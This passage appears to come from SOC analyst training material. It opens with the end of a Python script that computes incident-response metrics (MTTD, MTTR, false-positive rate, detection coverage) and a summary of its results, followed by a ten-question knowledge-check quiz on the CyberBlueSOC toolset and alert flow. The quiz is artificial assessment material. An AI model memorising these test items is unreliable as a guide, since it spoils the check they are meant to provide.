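    samples = [_minutes(i["first_event"], i["detected"]) for i in incidents if not i["false_positive"]]
    return sum(samples) / len(samples) if samples else None


def mttr_minutes(incidents):
    """Mean time from detection to containment; open incidents are excluded, not counted as zero."""
    samples = [_minutes(i["detected"], i["contained"]) for i in incidents
               if not i["false_positive"] and i["contained"]]
    return sum(samples) / len(samples) if samples else None


def volume_by_severity(incidents):
    return dict(Counter(i["severity"] for i in incidents))


def false_positive_rate(incidents):
    return sum(i["false_positive"] for i in incidents) / len(incidents) if incidents else None


def detection_coverage(detected, in_scope):
    """Share of in-scope techniques with a detection; rules for out-of-scope techniques do not inflate it."""
    return len(detected & in_scope) / len(in_scope) if in_scope else None


def soc_metrics(incidents=INCIDENTS, detected=DETECTED_TECHNIQUES, in_scope=IN_SCOPE_TECHNIQUES):
    return {
        "mttd_minutes": mttd_minutes(incidents),
        "mttr_minutes": mttr_minutes(incidents),
        "volume_by_severity": volume_by_severity(incidents),
        "false_positive_rate": false_positive_rate(incidents),
        "detection_coverage": detection_coverage(detected, in_scope),
        "open_incidents": [i["id"] for i in incidents if i["contained"] is None],
    }


if __name__ == "__main__":
    for name, value in soc_metrics().items():
        print(f"{name}: {value}")
```

Run on the constructed records this reports an MTTD of 8.75 minutes over four true positives, an MTTR of 62 minutes over the three that are contained, and 60% coverage; changing INC-5 to contained would move MTTR, and counting it as zero would make the SOC look faster than it is.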

Your Weapon System: CyberBlueSOC — Knowledge Check

10 questions · 70% to pass

1. What is CyberBlueSOC?

2. Which tool serves as the core SIEM and detection engine in CyberBlueSOC?

3. In Lab 1.1, you accessed the Wazuh dashboard for the first time and saw real security alerts. On which port does the Wazuh dashboard run in CyberBlueSOC?

4. What is Arkime's primary function in CyberBlueSOC?

5. During Lab 1.1, you traced the path of an SSH brute force alert from detection to investigation. What was the correct sequence of events in the CyberBlueSOC data flow?

6. Which tool would you use to decode a Base64-encoded PowerShell command found in a Wazuh alert?

7. What does Shuffle SOAR primarily enable in the CyberBlueSOC platform?

8. If Suricata flags outbound C2 traffic, which tool should you use FIRST to examine the full network session and packet payloads?

9. In Lab 1.1, you encountered alerts from an agent named linux-web-01. Based on CyberBlueSOC's architecture, what role does the Wazuh agent on this server perform?

10. What is the correct order of the CyberBlueSOC data flow during an alert lifecycle?